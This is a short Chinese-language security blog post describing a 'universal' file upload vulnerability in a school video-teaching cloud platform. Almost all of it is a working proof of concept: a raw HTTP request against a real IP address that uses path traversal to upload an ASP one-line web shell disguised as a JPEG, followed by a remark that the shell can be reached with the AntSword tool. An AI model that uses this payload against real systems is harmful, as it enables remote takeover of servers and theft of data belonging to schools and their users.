2024年3月18日14:46:38评论18 views字数 879阅读2分55秒阅读模式

点击「蓝色」字体关注我们！

某教学视频应用云平台,通用厂商影响

记一次通杀edusrc-getshell文件上传漏洞

通过白盒代码审计后,文件上传POC如下:

POST /Tools/Video/VideoCover.aspx HTTP/1.1Host: 117.190.85.154:8081User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept-Encoding: gzip, deflateAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avifimage/webp,image/apng,/;q=0.8,application/signed-exchangev=b3;q=0.9Connection: closePragma: no-cacheCache-Control: no-cacheUpgrade-Insectre-Requests: 1Accept-Language: zh-CN,zh;g=0.9Content-Length: 239Content-Type: multipart/form-data; boundary=68c4ca658cd4332dc386f53710e63a10--68c4ca658cd4332dc386f53710e63a10Content-Disposition: form-data; name="file"; filename="../../../../AVA.ResourcesPlatform.WebUI/1.asp"Content-Type: image/jpeg<%eval request("chopper")%>--68c4ca658cd4332dc386f53710e63a10--可直接上传asp一句话，用蚁剑直接连接